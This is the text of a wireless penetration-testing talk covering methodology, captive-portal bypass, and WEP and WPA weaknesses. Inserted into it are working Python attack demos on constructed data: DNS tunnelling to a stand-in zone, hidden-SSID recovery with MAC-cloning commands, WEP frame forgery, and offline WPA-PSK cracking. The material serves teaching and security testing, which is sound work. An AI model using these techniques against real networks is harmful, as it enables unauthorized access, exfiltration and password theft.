Strategic Security, Inc. © http://www.strategicsec.com/
Wireless Penetration Testing is More Than
Cracking WEP
Presented By: Joe McCray
Hmmm......Interesting
Anybody Hungry???
Don’t Worry About Turning Off Your Phones For This
Presentation. I’ll Take Care Of That For You.
Now What Day Did You Say You Checked In?
What If I Want Percocet More Than Every 4
Hours?
I Want To Join The Group Too: The Domain Admin Group.
How Did You Do All Of This?
1. Scope of Wireless Penetration Testing
2. Methodology
3. Tools of the trade
4. Peeling The Onion of a Wireless Network
5. It's all about the data
Agenda
1. Reconnaissance Phase
2. Attack (Penetration Testing) Phase
3. Range Survey Phase
4. Reporting
Methodology
1. Initial Observations
Conducted on foot or in a car, using a handheld device or laptop to gather signal
strength and a listing of available wireless networks.
2. Analysis of available networks
Silently gather information about WAPs and the clients using each WAP.
- Determine whether each network is in scope for the assessment.
3. Gather Network and AP Information
Gather details for all networks under test.
- Use packet captures to record traffic passing over the network.
Reconnaissance Phase
1. Use the data gathered in the recon phase to build a prioritized list of targets.
2. Survey and sniff open access points (if any).
3. Break WEP/WPA encryption where it is in use.
4. Prepare a fake RADIUS server for WPA/WPA2-Enterprise (802.1X) networks.
5. Launch MiTM attacks.
6. Use other attack patterns as appropriate.
Attack (Penetration Testing) Phase
1. Survey with a typical wireless card, omni-directional antenna, and GPS.
2. Survey with a typical wireless card, directional antenna, and GPS.
3. Generate signal maps using the gathered data and a mapping utility.
Range Survey Phase
Customers tend to implement the following:
1. Configuration parameter ambiguity
2. 802.11 Wireless Authentication
3. 802.11 Wireless Encryption
4. Wireless Network Isolation
5. Wireless Client Isolation
....Just remember that we're on offense. We're pentesters.
Peeling Back The Layers
Configuration Parameter Ambiguity
- SSID Broadcast Disabled
- MAC Address Filtering
Configuration Ambiguity
Wireless Authentication
WEP -- Poorest
Cisco's LEAP -- Poor
WPA-PSK -- Better
WPA-Enterprise -- Best
Wireless Authentication
Wireless Encryption
WEP -- Poorest
WPA (TKIP) -- Better
WPA2 (AES) -- Best
Wireless Encryption
Wireless Network Isolation
Zero Separation -- Poorest
Layer 3 Routed Boundary -- Poor
Firewalled Boundary -- Better
VPN Concentrator -- Best
Wireless Separation
Zero Separation is all too common.
Countless times I see wireless networks that are basically bridged to the LAN.
There is no work required for me to get to the LAN.
Wireless Network Isolation
Layer 3 Routed Boundary is almost as common.
Your best shot here is using EXTREMELY specific ACLs, and to be honest that
doesn't help much either.
Wireless Network Isolation
Used commonly in Hotels, Airports, Coffee Shops, etc…
2 Primary bypass methods
- Impersonating an Authorized Wireless Client (cloning the MAC/IP of a station that has already authenticated)
- Tunneling Traffic out of the network via DNS or ICMP (protocols the portal typically lets through before authentication)
Captive Portal
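The DNS-tunneling bypass listed above, shown as an added example (not code from the deck): the tunnel zone `t.example.net`, the sequence-label scheme and the payload are all constructed here, and only the encode/decode step is shown, since the portal's resolver forwarding the query to the zone's nameserver is what does the rest. The design point is the two limits a resolver enforces, 63 characters per label and 253 per name, which dictate how much data each query can carry.

```python
"""Encoding side of a DNS tunnel through a captive portal: data the portal
blocks is smuggled inside query names, which the portal's resolver forwards
to the tunnel zone's nameserver before the client has authenticated.
Added example, not code from the deck; the tunnel domain and payload are
constructed, and no queries are actually sent."""
import base64

DOMAIN = "t.example.net"          # hypothetical tunnel zone the attacker controls
LABEL_MAX, NAME_MAX = 63, 253     # RFC 1035 limits a resolver enforces
SEQ_WIDTH = 4                     # hex sequence label, so the server can reorder


def chunk_size(domain):
    """Bytes of payload that fit in one name once the sequence label, the
    domain and base32 expansion (5 bytes -> 8 chars) are accounted for."""
    budget = NAME_MAX - len(domain) - 1 - (SEQ_WIDTH + 1)
    labels = budget // (LABEL_MAX + 1)            # each label costs 63 chars + a dot
    return labels * LABEL_MAX * 5 // 8


def encode_queries(payload, domain=DOMAIN):
    """Client side: split payload into names <seq>.<base32 labels>.<domain>."""
    size, names = chunk_size(domain), []
    for seq, off in enumerate(range(0, len(payload), size)):
        b32 = base64.b32encode(payload[off:off + size]).decode().rstrip("=").lower()
        labels = [b32[i:i + LABEL_MAX] for i in range(0, len(b32), LABEL_MAX)]
        names.append(f"{seq:0{SEQ_WIDTH}x}." + ".".join(labels) + "." + domain)
    return names


def decode_queries(names, domain=DOMAIN):
    """Server side: strip the zone, decode each chunk, reassemble by sequence
    number (recursive resolvers reorder and retry, so arrival order is useless)."""
    chunks = {}
    for name in names:
        if not name.endswith("." + domain):
            raise ValueError("query outside the tunnel zone: " + name)
        seq, *labels = name[:-(len(domain) + 1)].split(".")
        b32 = "".join(labels).upper()
        chunks[int(seq, 16)] = base64.b32decode(b32 + "=" * (-len(b32) % 8))
    return b"".join(chunks[k] for k in sorted(chunks))


def valid_name(name):
    """The limits a resolver would reject a name on."""
    return len(name) <= NAME_MAX and all(1 <= len(l) <= LABEL_MAX for l in name.split("."))


if __name__ == "__main__":
    names = encode_queries(b"id=1;report=" + bytes(range(256)))
    print(len(names), "queries, first:", names[0])
    print("round trip ok:", decode_queries(names).endswith(bytes(range(256))))
```

The same framing works for ICMP echo payloads, with the ICMP identifier/sequence fields taking the place of the sequence label; the defensive check on the portal side is the mirror image of `valid_name`: rate-limit and inspect queries whose names are long, high-entropy and all headed for one zone.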
Firewalled Boundary is much less common.
In my opinion the only thing you really get with this over the routed boundary is
better logging.
Wireless Network Isolation
VPN Concentrator is even less common, but it's probably your best option if you find
that packet overhead isn't affecting business operations.
This can really slow down your network.
Wireless Network Isolation
Let's start with the simple stuff....
Simple security mechanisms suck
- SSID Broadcast disabled
- MAC Address Filtering
Wireless Traffic That Reveals Confidential Information
Rogue Access Points
- Employees deploying rogue APs
- Malicious attackers deploying rogue APs
OK – I’m Bored – Let’s Do Some Hacking
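Why the two "simple mechanisms" (disabled SSID broadcast and MAC filtering, from this slide and the Configuration Ambiguity slide earlier) give nothing: the SSID still travels in the clear in probe requests, probe responses and association requests, and every admitted client's MAC is visible in its data frames. The following is an added example, not code from the deck; it parses raw 802.11 management and data frames that are constructed inline in place of a capture, and the `wlan0` interface name in the MAC-cloning commands is hypothetical.

```python
"""Undo the two "simple mechanisms": read a hidden SSID out of the frames
that carry it anyway, and list the client MACs a MAC filter has admitted
so one can be cloned. Added example, not code from the deck; the frames
below are constructed inline in place of a capture."""

MGMT, DATA = 0, 2                                       # 802.11 frame types
ASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 4, 5, 8   # management subtypes
TAG_SSID = 0                                            # SSID information element
# Fixed-parameter bytes between the 24-byte MAC header and the tagged parameters.
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, PROBE_REQ: 0, ASSOC_REQ: 4}
BROADCAST = b"\xff" * 6

def mac(b):
    return ":".join("%02x" % x for x in b)

def parse_header(frame):
    """Frame control + addresses: (type, subtype, ToDS, FromDS, addr1, addr2, addr3)."""
    fc, flags = frame[0], frame[1]
    return ((fc >> 2) & 0x3, fc >> 4, flags & 0x1, (flags >> 1) & 0x1,
            frame[4:10], frame[10:16], frame[16:22])

def tagged_params(body):
    """Yield (tag, value) for each information element in body."""
    i = 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        yield tag, body[i + 2:i + 2 + length]
        i += 2 + length

def ssid_of(frame):
    """SSID carried by a management frame, or None. A 'hidden' network beacons
    an empty or NUL-filled SSID, but probe requests for it, the AP's probe
    responses and association requests all carry the real name in the clear."""
    ftype, subtype, *_ = parse_header(frame)
    if ftype != MGMT or subtype not in FIXED_LEN:
        return None
    for tag, val in tagged_params(frame[24 + FIXED_LEN[subtype]:]):
        if tag == TAG_SSID:
            return val.decode("utf-8", "replace").strip("\x00") or None
    return None

def survey(frames):
    """Map BSSID -> {'ssid', 'hidden', 'clients'} over a list of raw frames."""
    nets = {}
    def net(bssid):
        return nets.setdefault(bssid, {"ssid": None, "hidden": False, "clients": set()})
    for f in frames:
        ftype, subtype, to_ds, from_ds, a1, a2, a3 = parse_header(f)
        if ftype == MGMT and subtype in FIXED_LEN:
            if a3 == BROADCAST:                 # undirected probe request, no BSSID
                continue
            n, name = net(a3), ssid_of(f)
            if subtype == BEACON and name is None:
                n["hidden"] = True
            elif name:
                n["ssid"] = name                # leaked by a non-beacon frame
            if subtype == ASSOC_REQ:
                n["clients"].add(a2)            # a station the filter admitted
        elif ftype == DATA and to_ds and not from_ds:
            net(a1)["clients"].add(a2)          # station -> AP: addr2 is the client
        elif ftype == DATA and from_ds and not to_ds and not a1[0] & 1:
            net(a2)["clients"].add(a1)          # AP -> station (skip multicast)
    return nets

def clone_mac_commands(iface, client):
    """Linux commands to adopt an admitted client's MAC; iface name is hypothetical."""
    return [f"ip link set {iface} down",
            f"ip link set {iface} address {mac(client)}",
            f"ip link set {iface} up"]

# --- constructed frames standing in for a capture ---
def _mgmt(subtype, a1, a2, a3, ssid):
    fc = bytes([(subtype << 4) | (MGMT << 2), 0])
    return (fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + b"\x00" * FIXED_LEN[subtype]
            + bytes([TAG_SSID, len(ssid)]) + ssid)

def _data(to_ds, a1, a2, a3):
    fc = bytes([DATA << 2, 0x01 if to_ds else 0x02])
    return fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + b"\xaa\xaa\x03"

AP = bytes.fromhex("001122334455")        # constructed BSSID
STA = bytes.fromhex("66778899aabb")       # constructed admitted client
SAMPLE_FRAMES = [
    _mgmt(BEACON, BROADCAST, AP, AP, b""),                 # SSID broadcast disabled
    _mgmt(PROBE_REQ, AP, STA, AP, b"corp-hidden"),         # client asks for it by name
    _mgmt(PROBE_RESP, STA, AP, AP, b"corp-hidden"),        # AP answers with the name
    _mgmt(ASSOC_REQ, AP, STA, AP, b"corp-hidden"),
    _data(True, AP, STA, bytes.fromhex("c0ffee000001")),   # client traffic to the AP
]

if __name__ == "__main__":
    for bssid, n in survey(SAMPLE_FRAMES).items():
        print(mac(bssid), n["ssid"], "(hidden)" if n["hidden"] else "",
              [mac(c) for c in n["clients"]], clone_mac_commands("wlan0", STA))
```

Against a real capture the frames come from a monitor-mode interface (radiotap header stripped first); a deauth of one client is enough to force the probe/association exchange that leaks the name.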
WEP was the first encryption standard available for wireless networks. WEP
can be deployed in two strengths, 64 bit and 128 bit. 64-bit WEP consists of a
40-bit secret key and a 24-bit initialization vector (IV), and is often referred to
as 40-bit WEP. 128-bit WEP similarly employs a 104-bit secret key and a 24-bit
initialization vector and is often called 104-bit WEP.
Association with WEP encrypted networks can be accomplished through the use of
a passphrase (run through a vendor key generator), an ASCII key, or a hexadecimal
key. The way WEP uses RC4, a 24-bit IV prepended to a static key plus a linear
CRC-32 integrity check, was shown to be flawed, allowing an attacker to recover
the key and compromise WEP encrypted networks.
Attacking Wireless Authentication &
Encryption Mechanisms
- WEP has been dead since 2001 (Fluhrer, Mantin and Shamir's RC4 key-scheduling attack)
- 2 Primary Methods of attacking WEP
- Collection of weak IVs
Every 802.11 data frame starts with the same LLC/SNAP byte (0xAA), so the first
keystream byte of every frame is known. For a "weak" IV that byte, fed back
through the Key Scheduling Algorithm (KSA) and the Pseudo Random Number
Generator (PRNG), leaks a byte of the secret key with a few percent probability.
After somewhere between 1,500 and 5,000 weak IVs are collected the first byte
of the key is revealed. This process is then repeated for each byte until the
WEP key is cracked.
- Collection of unique IVs (KoreK's chopchop attack)
The last byte of the WEP packet is removed, which breaks the Cyclic Redundancy
Check/Integrity Check Value (CRC/ICV). For each of the 256 possible values of the
removed plaintext byte there is a known value that, XORed into the last four
bytes of the truncated packet, makes the CRC valid again. The packet is
retransmitted with each candidate correction; the AP only relays the one whose
ICV checks out, which confirms that plaintext byte. Repeating this byte by byte
recovers the packet and its keystream without ever knowing the key.
WEP IS DEAD!!!!!!!
WEP is dead continued...
The biggest problem with attacks against WEP is collecting enough packets.
Traffic can be injected into the network to create more. This is usually
accomplished by capturing one or more encrypted Address Resolution Protocol
(ARP) packets and retransmitting them to the access point. ARP packets are a
good choice because they have a predictable size (a 28-byte ARP payload), so
they can be picked out by length alone even though their contents are
encrypted, and because every replayed request provokes a reply. The replies are
new frames with fresh IVs, generated at whatever rate the attacker replays, which
dramatically increases the speed at which packets are collected.
WEP IS DEAD!!!!!!!
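The two design flaws behind everything on the last three slides, as an added example that is not code from the deck: a 24-bit IV that repeats (so two frames under one IV expose the XOR of their plaintexts, which a predictable ARP then resolves) and a CRC-32 ICV that is linear (so a frame can be altered in flight, without the key, and still pass the check). The key, IV and plaintexts are constructed; the frame layout (IV, key index, RC4 over data plus little-endian CRC-32) is WEP's.

```python
"""WEP as deployed, and two consequences of its design: the 24-bit IV
repeats, and the CRC-32 ICV is linear, so a frame can be altered in flight
and still pass the integrity check. Added example, not code from the deck;
the key, IV and plaintexts are constructed for the demo."""
import struct
import zlib


def rc4(key, length):
    """RC4: key scheduling (KSA) then keystream generation (PRGA). WEP seeds
    it with IV || secret key, which is what the weak-IV attacks exploit."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def wep_encrypt(key, iv, plaintext):
    """Frame body: IV (3) || key index (1) || RC4(IV||key) over P || CRC32(P)."""
    body = plaintext + struct.pack("<I", crc32(plaintext))
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key, frame):
    """Return the plaintext, or None when the ICV fails (the AP then drops it)."""
    iv, body = frame[:3], frame[4:]
    data = xor(body, rc4(iv + key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    return plaintext if struct.unpack("<I", icv)[0] == crc32(plaintext) else None


def flip_bits(frame, delta):
    """Modify an encrypted frame without the key (Borisov/Goldberg/Wagner).
    CRC-32 is affine: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(0...0), so XORing
    D into the ciphertext and the matching correction into the encrypted ICV
    keeps the frame valid. `delta` must be as long as the plaintext."""
    icv_delta = crc32(delta) ^ crc32(b"\x00" * len(delta))
    return frame[:4] + xor(frame[4:], delta + struct.pack("<I", icv_delta))


def keystream_reuse(frame_a, frame_b):
    """Two frames under one IV share a keystream: the XOR of the ciphertexts is
    the XOR of the plaintexts, so one known plaintext (a predictable ARP)
    reveals the other. A busy AP cycles through all 2^24 IVs within hours."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("different IVs, no keystream reuse")
    return xor(frame_a[4:], frame_b[4:])


KEY = bytes.fromhex("0102030405")   # constructed 40-bit secret key
IV = b"\x0c\x0a\xfe"                 # constructed 24-bit IV
ORIGINAL, FORGED = b"amount=0100", b"amount=9999"

if __name__ == "__main__":
    frame = wep_encrypt(KEY, IV, ORIGINAL)
    forged = flip_bits(frame, xor(ORIGINAL, FORGED))
    print("forged frame decrypts to:", wep_decrypt(KEY, forged))
    other = wep_encrypt(KEY, IV, b"amount=1234")
    print("plaintext XOR leaked by IV reuse:", keystream_reuse(frame, other)[:11].hex())
```

The chopchop attack on the previous slide rests on the same `flip_bits` arithmetic, run backwards: instead of choosing the delta, it guesses the dropped plaintext byte and lets the AP's accept/drop decision confirm the guess.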
WPA was developed to replace WEP because of the vulnerabilities associated with it.
WPA can be deployed either using a pre-shared key (WPA-PSK) or in conjunction
with a RADIUS server (WPA-Enterprise, also called WPA-RADIUS). WPA uses either
the Temporal Key Integrity Protocol (TKIP) or the Advanced Encryption Standard
(AES, in CCMP mode) for its encryption algorithm.
WPA was an interim subset of the 802.11i standard designed to run on WEP-era
hardware; WPA2 implements the full standard. The primary difference is that WPA2
mandates AES-CCMP and allows TKIP only for backward compatibility, whereas WPA
mandates TKIP and offers AES as an option.
A short or dictionary-based passphrase is a weakness of PSK mode under both WPA
and WPA2: the four-way handshake can be captured and the passphrase attacked
offline.
What About WPA??
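The offline PSK attack the slide refers to, as an added example that is not code from the deck: the PMK, PTK and EAPOL-Key MIC derivations follow 802.11i, and the "captured" handshake is constructed in-script from a known passphrase so the attack runs without a capture file. The SSID `corpnet`, both MACs, the nonces, the passphrase and the word list are all constructed.

```python
"""Why a weak WPA/WPA2-PSK passphrase falls to an offline attack: every
input to the handshake MIC except the passphrase crosses the air in the
clear. Added example, not code from the deck; the "captured" handshake is
constructed in-script from a known passphrase. Derivations follow 802.11i
(PBKDF2 PMK, PRF-512 PTK, EAPOL-Key MIC)."""
import hashlib
import hmac
import struct


def pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes, ap_mac, sta_mac, anonce, snonce):
    """PRF-512: HMAC-SHA1 over the sorted MACs and nonces; bytes 0-15 are the KCK."""
    data = (b"Pairwise key expansion\x00" + min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return b"".join(hmac.new(pmk_bytes, data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


# EAPOL(4) + type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFF = 81


def eapol_mic(kck, eapol, version):
    """MIC over the EAPOL-Key frame with its 16-byte MIC field zeroed.
    Key descriptor version 1 (WPA/TKIP) uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, msg2, wordlist):
    """Offline dictionary attack: recompute the message-2 MIC per candidate.
    ANonce comes from message 1, SNonce and the MIC from message 2."""
    version = struct.unpack(">H", msg2[5:7])[0] & 0x7
    snonce, mic = msg2[17:49], msg2[MIC_OFF:MIC_OFF + 16]
    for word in wordlist:
        kck = ptk(pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, version), mic):
            return word
    return None


# --- constructed "capture" standing in for airodump-ng's .cap ---
def build_msg2(snonce, version, kck):
    """Station's handshake message 2: carries SNonce and a MIC under the KCK."""
    key_info = 0x0100 | version            # pairwise bit + descriptor version
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x01\x03" + struct.pack(">H", len(body)) + body
    return frame[:MIC_OFF] + eapol_mic(kck, frame, version) + frame[MIC_OFF + 16:]


SSID = "corpnet"                                           # constructed
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
PASSPHRASE = "Summer2012!"                                 # the weak PSK under test
WORDLIST = ["password", "corpnet123", "Summer2012!", "letmein"]
MSG2 = build_msg2(SNONCE, 2, ptk(pmk(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16])

if __name__ == "__main__":
    print("recovered PSK:", crack(SSID, AP_MAC, STA_MAC, ANONCE, MSG2, WORDLIST))
```

Note that the SSID is a salt, not a secret, so per-SSID rainbow tables exist for common names; and PBKDF2 at 4096 rounds is the only thing rate-limiting the attacker, so the passphrase's length and randomness are the whole defence.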
In enterprise mode, WPA/WPA2 add an authentication piece (802.1X) on top of the
encryption piece. A form of the Extensible Authentication Protocol (EAP) is used
for it. Five EAP types are commonly used with WPA/WPA2-Enterprise:
- EAP-TLS
- EAP-TTLS/MSCHAPv2
- PEAPv0/EAP-MSCHAPv2
- PEAPv1/EAP-GTC
- EAP-SIM
The tunnelled types (EAP-TTLS and PEAP) are only as strong as the client's
validation of the RADIUS server's certificate; a client that skips that check
hands its inner MSCHAPv2 challenge/response to the fake RADIUS server from the
attack phase.
WPA Continued...
At the end of the day wireless penetration testing is really about verifying
whether or not an attacker can gain access to your production network.
At its core it’s no different than physical security testing. Can you get to the
production network?
At The End Of The Day....It’s All About The Data
If you have other questions you’d like to ask outside of this conference,
or if you want to get a copy of my slides you can contact me at:
Email: [email protected]
Twitter: @j0emccray
LinkedIn: http://www.linkedin.com/in/joemccray